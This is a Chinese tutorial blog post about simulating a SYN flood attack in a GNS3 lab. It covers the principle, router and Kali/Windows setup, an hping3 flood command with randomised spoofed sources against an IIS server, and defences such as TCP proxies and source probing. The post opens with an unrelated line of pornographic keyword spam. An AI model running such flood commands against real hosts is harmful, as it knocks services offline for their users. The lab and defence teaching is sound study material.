国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood

這篇具有很好參考價值的文章主要介紹了網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一、SYN Flood原理

在TCP三次握手過程中,

  • 客戶端發(fā)送一個SYN包給服務(wù)器
  • 服務(wù)端接收到SYN包后,會回復(fù)SYN+ACK包給客戶端,然后等待客戶端回復(fù)ACK包。
  • 但此時客戶端并不會回復(fù)ACK包,所以服務(wù)端就只能一直等待直到超時。服務(wù)端超時后會重發(fā)SYN+ACK包給客戶端,默認(rèn)會重試5次,而且每次等待的時間都會增加。

服務(wù)器收到客戶端發(fā)來的SYN會建立一個半連接狀態(tài)的Socket,當(dāng)客戶端在一定時間內(nèi)持續(xù)不斷的發(fā)大量的SYN包但不回復(fù)ACK包,就會耗盡服務(wù)端的資源,這就是SYN Flood攻擊。

二、模擬SYN Flood攻擊

1、實驗環(huán)境

kali、Windows10、GNS3

2、網(wǎng)絡(luò)拓?fù)?/h3>

3、實驗配置

  • GNS3路由器
R1#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#int f0/0
R1(config-if)#ip add 192.168.10.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#int f1/0
R1(config-if)#ip add 192.168.100.254 255.255.255.0
R1(config-if)#no shut
R1(config-if)#
  • kali虛擬機(jī)配置網(wǎng)卡eth0
#打開interfaces文件并添加eth0網(wǎng)卡                                                                            
┌──(root?kali)-[/home/kali]
└─# vim /etc/network/interfaces                                                                                                                                                       

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

  • ?啟用網(wǎng)卡并查看IP配置是否成功
┌──(root?kali)-[/home/kali]
└─# ifdown eth0
ifdown: interface eth0 not configured
                                                                                                                                                          
┌──(root?kali)-[/home/kali]
└─# ifup eth0

 #ifconfig查看上述更改是否生效                                                                            
┌──(root?kali)-[/home/kali]
└─# ifconfig 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.1  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fee2:4449  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:e2:44:49  txqueuelen 1000  (Ethernet)
        RX packets 552  bytes 47915 (46.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 51  bytes 7410 (7.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 18558  bytes 1513808 (1.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 18558  bytes 1513808 (1.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

#ping測試看網(wǎng)關(guān)是否可達(dá)                                                                            
┌──(root?kali)-[/home/kali]
└─# ping 192.168.10.254         
PING 192.168.10.254 (192.168.10.254) 56(84) bytes of data.
64 bytes from 192.168.10.254: icmp_seq=1 ttl=255 time=44.6 ms
64 bytes from 192.168.10.254: icmp_seq=2 ttl=255 time=25.1 ms
^C
--- 192.168.10.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 25.077/34.838/44.599/9.761 ms
  • 查看kali路由:?
└─# route -n           
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.10.254  0.0.0.0         UG    0      0        0 eth0
192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
  • Windows使用命令配靜態(tài)IP
C:\Windows\system32>netsh interface ip set address "Ethernet0" static 192.168.100.1 255.255.255.0 192.168.100.254  
#查看IP是否設(shè)置成功                                                                                                                                                                                                                                                                                                                                 C:\Windows\system32>ipconfig  
#ping測試看網(wǎng)關(guān)是否可達(dá)                                                                                                                                                                                                                                                                                                                                                                                                                         C:\Windows\system32>ping 192.168.100.254                                                                                                                                                                                                         

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

ping測試 :kali 虛擬機(jī)pingWindows server 2016虛擬機(jī)

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

4、搭建IIS服務(wù)

  • Windows server 2016上面搭建IIS服務(wù)并在本地進(jìn)行訪問

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

  • kali火狐瀏覽器訪問

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

肉雞:幾十萬臺同時在發(fā)幾十萬個包

DDOS計算的是同時的流量

5、實施SYN Flood攻擊

  • 工具:kali (hping3 )
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.100.1
#-c 發(fā)送 包的數(shù)量
#-d 發(fā)送包的大小
#-S 只發(fā)送SYN的報文
-w 指定Windows窗口大小
#-p 指定目標(biāo)端口80
#--flood 
#--rand-source發(fā)請求的時候指定隨機(jī)的IP
#服務(wù)器的IP

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

  • 多開幾個shell進(jìn)行 SYN Flood攻擊:

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

  • ?抓到的ICMP數(shù)據(jù)包

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

三、如何防御SYN Flood

1、使用TCP代理的方式

客戶機(jī)先和代理服務(wù)器建立TCP連接,代理服務(wù)器收到TCP的ACK后,再將數(shù)據(jù)轉(zhuǎn)發(fā)給服務(wù)器

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

如果用DDOS服務(wù)器將代理服務(wù)器打掉了,服務(wù)器也不能正常提供服務(wù)了,因為服務(wù)器是通過代理來提供服務(wù)的。代理:選代理一般使用高性能防火墻。

2、TCP的源探測,探測發(fā)送方

client發(fā)送syn請求,防火墻偽造SYN+ACk報文,如果客戶機(jī)是虛假的源就不會響應(yīng),如果客戶機(jī)是真實的源,就會發(fā)一個重新建立連接請求的RST報文。防火墻收到RST報文得知客戶機(jī)是真實的,放通將數(shù)據(jù)傳到服務(wù)器。

網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood,安全與運(yùn)維,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

知識補(bǔ)充:下一代防火墻NGFW

不同信任級別的網(wǎng)絡(luò)之間的一個線速(wire-speed)實時防護(hù)設(shè)備,能夠?qū)α髁繄?zhí)行深度檢測,并阻斷攻擊。文章來源地址http://www.zghlxwxcb.cn/news/detail-819897.html

  • 前向兼容傳統(tǒng)防火墻的功能,包括包過濾、協(xié)議狀態(tài)過濾、NAT和VPN。
  • 具備應(yīng)用感知能力,能基于應(yīng)用實施精細(xì)化的安全管控策略和層次化的帶寬管理手段。
  • 支持IPS功能,實現(xiàn)IPS(入侵防御系統(tǒng))與防火墻的深度融合。
    IPS系統(tǒng)是位于防火墻和網(wǎng)絡(luò)的設(shè)備之間的設(shè)備,當(dāng)檢測到攻擊時,IPS會在這種攻擊擴(kuò)散到網(wǎng)絡(luò)其他地方前阻止這個惡意通信。
    NGFW可以根據(jù)IPS檢測的惡意流量自動更新下發(fā)安全策略,而不需要管理員介入。
  • 利用防火墻以外的信息,增強(qiáng)管控能力
    如利用ITit系統(tǒng)提供的用戶信息、位置信息、漏洞和網(wǎng)絡(luò)資源信息等,幫助改進(jìn)和優(yōu)化安全策略。如:通過集成用戶認(rèn)證系統(tǒng),實現(xiàn)基于用戶的安全策略,以應(yīng)對移動辦公場景下IP地址變化帶來的管控難題。

到了這里,關(guān)于網(wǎng)絡(luò)協(xié)議與攻擊模擬_06攻擊模擬SYN Flood的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 網(wǎng)絡(luò)協(xié)議與攻擊模擬_08DHCP協(xié)議

    網(wǎng)絡(luò)協(xié)議與攻擊模擬_08DHCP協(xié)議

    技術(shù)學(xué)習(xí)要了解某項技術(shù)能干什么?它的詳細(xì)內(nèi)容?發(fā)展走向? dhcp動態(tài)主機(jī)配置協(xié)議,廣泛應(yīng)用于局域網(wǎng)內(nèi)部? 主要是為客戶機(jī)提供TCP/IP 參數(shù)(IP地址、子網(wǎng)掩碼、網(wǎng)關(guān)、DNS等) 減少管理員的工作量 避免輸入錯誤 避免IP沖突 提高IP地址的利用 dhcp是應(yīng)用層的協(xié)議,是基于傳

    2024年01月25日
    瀏覽(85)
  • 網(wǎng)絡(luò)協(xié)議與攻擊模擬-17-DNS協(xié)議-報文格式

    網(wǎng)絡(luò)協(xié)議與攻擊模擬-17-DNS協(xié)議-報文格式

    客戶機(jī)想要訪問www.baidu.com,根據(jù)自己的 TCP / IP 參數(shù),向自己的首選 DNS 服務(wù)器發(fā)送 DNS 請求 首選 DNS 收到客戶機(jī)的請求后,會去查詢自己的區(qū)域文件,找不到www.baidu.com的 IP 地址信息(將請求轉(zhuǎn)發(fā)到根域服務(wù)器,需要配置根提示);直接可以找到www.baidu.com的 IP 地址信息(直接

    2024年02月16日
    瀏覽(776)
  • 網(wǎng)絡(luò)協(xié)議與攻擊模擬_01winshark工具簡介

    網(wǎng)絡(luò)協(xié)議與攻擊模擬_01winshark工具簡介

    網(wǎng)絡(luò)接口層(沒有特定的協(xié)議)? ? 物理層:PPPOE寬帶撥號(應(yīng)用場景:寬帶撥號,運(yùn)營商切網(wǎng)過來沒有固定IP就需要撥號,家庭帶寬一般都采用的是撥號方式) 數(shù)據(jù)鏈路層 網(wǎng)絡(luò)層:IP(v4/v6) ARP(地址解析協(xié)議) RARP 、ICMP(internet控制報文協(xié)議) IGMP 傳輸層:TCP(傳輸控制

    2024年01月22日
    瀏覽(23)
  • 網(wǎng)絡(luò)協(xié)議與攻擊模擬_04ICMP協(xié)議與ICMP重定向

    網(wǎng)絡(luò)協(xié)議與攻擊模擬_04ICMP協(xié)議與ICMP重定向

    ICMP協(xié)議是網(wǎng)絡(luò)層協(xié)議, 利用ICMP協(xié)議可以實現(xiàn)網(wǎng)絡(luò)中監(jiān)聽服務(wù)和拒絕服務(wù),如 ICMP重定向的攻擊。 ICMP是Internet控制報文協(xié)議,用于在IP主機(jī)、路由器之間傳遞控制消息,控制消息指網(wǎng)絡(luò)通不通、主機(jī)是否可達(dá),路由是否可用等等。 案例 環(huán)境:GNS3 路由器 交換機(jī) 電腦 slots設(shè)置

    2024年01月16日
    瀏覽(23)
  • 【共讀】企業(yè)信息安全建設(shè)與運(yùn)維指南(二)

    【共讀】企業(yè)信息安全建設(shè)與運(yùn)維指南(二)

    接上篇繼續(xù)往下: 【共讀】企業(yè)信息安全建設(shè)與運(yùn)維指南(一) 三、IDC基礎(chǔ)安全體系建設(shè): IDC(Internet Data Center)即互聯(lián)網(wǎng)數(shù)據(jù)中心,為企業(yè)用戶或客戶提供服務(wù),如網(wǎng)站應(yīng)用服務(wù)、App應(yīng)用后臺服務(wù)等等,IDC中存儲著各類敏感信息和數(shù)據(jù)資產(chǎn),所以IDC安全是企業(yè)信息安全的重中

    2024年01月22日
    瀏覽(86)
  • 【五一創(chuàng)作】網(wǎng)絡(luò)協(xié)議與攻擊模擬-01-wireshark使用-捕獲過濾器

    【五一創(chuàng)作】網(wǎng)絡(luò)協(xié)議與攻擊模擬-01-wireshark使用-捕獲過濾器

    網(wǎng)絡(luò)接口層(沒有特定的協(xié)議)PPPOE 物理層 數(shù)據(jù)鏈路層 網(wǎng)絡(luò)層:IP (v4/v6) ARP (地址解析協(xié)議) RARP ICMP (Internet控制報文協(xié)議) IGMP 傳輸層:TCP(傳輸控制協(xié)議) UDP(用戶數(shù)據(jù)報協(xié)議) 應(yīng)用層:都是基于傳輸層協(xié)議的端口,總共端口0~65535 0~1023 HTTP—tcp80 HTTPS-----TCP443 DHCP DNS HTTP HTTPS FTP SMTP POP3 I

    2024年02月02日
    瀏覽(25)
  • TCP協(xié)議網(wǎng)絡(luò)安全攻擊

    TCP協(xié)議網(wǎng)絡(luò)安全攻擊

    作者 | 吳延占 上??匕部尚跑浖?chuàng)新研究院研發(fā)工程師 來源 | ?鑒源實驗室 引言: 隨著計算機(jī)、控制與網(wǎng)絡(luò)技術(shù)的飛速發(fā)展,信息化時代已經(jīng)到來。TCP協(xié)議作為可靠性傳輸協(xié)議,在工業(yè)自動化、軌道交通、新能源等領(lǐng)域的數(shù)據(jù)傳輸方面得到了廣泛使用。在使用TCP協(xié)議做數(shù)據(jù)

    2024年02月16日
    瀏覽(96)
  • zz016網(wǎng)絡(luò)建設(shè)與運(yùn)維正式賽卷(路由)

    1.配置所有設(shè)備主機(jī)名,名稱見“網(wǎng)絡(luò)拓?fù)洹?。啟用所有設(shè)備的ssh服務(wù),用戶名和明文密碼均為admin;配置所有設(shè)備ssh連接超時為9分鐘,console 連接超時為30分鐘。 SW1 ssh-server enable ssh-server timeout 540 exec-timeout 30 SW2 ssh-server enable ssh-server timeout 540 exec-timeout 30 SW3 ssh-server enable ss

    2024年02月02日
    瀏覽(28)
  • 1+x網(wǎng)絡(luò)系統(tǒng)建設(shè)與運(yùn)維(中級)-練習(xí)題

    1+x網(wǎng)絡(luò)系統(tǒng)建設(shè)與運(yùn)維(中級)-練習(xí)題

    同理可得,所有交換機(jī)和路由器都用一下命令配置 Huaweisys [Huawei]sysn LSW1 ? LSW1: [LSW1]vlan batch 10 20 [LSW1]int e0/0/1 [LSW1-Ethernet0/0/1]port link-type access [LSW1-Ethernet0/0/1]port default vlan 10 [LSW1-Ethernet0/0/1]int e0/0/2 [LSW1-Ethernet0/0/2]port link-type access [LSW1-Ethernet0/0/2]port default vlan 20 [LSW1-Ethernet0/0

    2024年02月04日
    瀏覽(30)
  • 華為1+X認(rèn)證網(wǎng)絡(luò)系統(tǒng)管理與運(yùn)維中級實驗

    華為1+X認(rèn)證網(wǎng)絡(luò)系統(tǒng)管理與運(yùn)維中級實驗

    實驗拓?fù)?? ? 配置參數(shù) ? ? ? ? ? ? 任務(wù)1:設(shè)備命名 為了方便后期維護(hù)和故障定位及網(wǎng)絡(luò)的規(guī)范性,需要對網(wǎng)絡(luò)設(shè)備進(jìn)行規(guī)范化命名。 請根據(jù)Figure 3-1實驗考試拓?fù)鋵υO(shè)備進(jìn)行命名。 命名規(guī)則為:城市-設(shè)備的設(shè)置地點-設(shè)備的功能屬性和序號-設(shè)備型號。 例如::處于

    2024年02月05日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包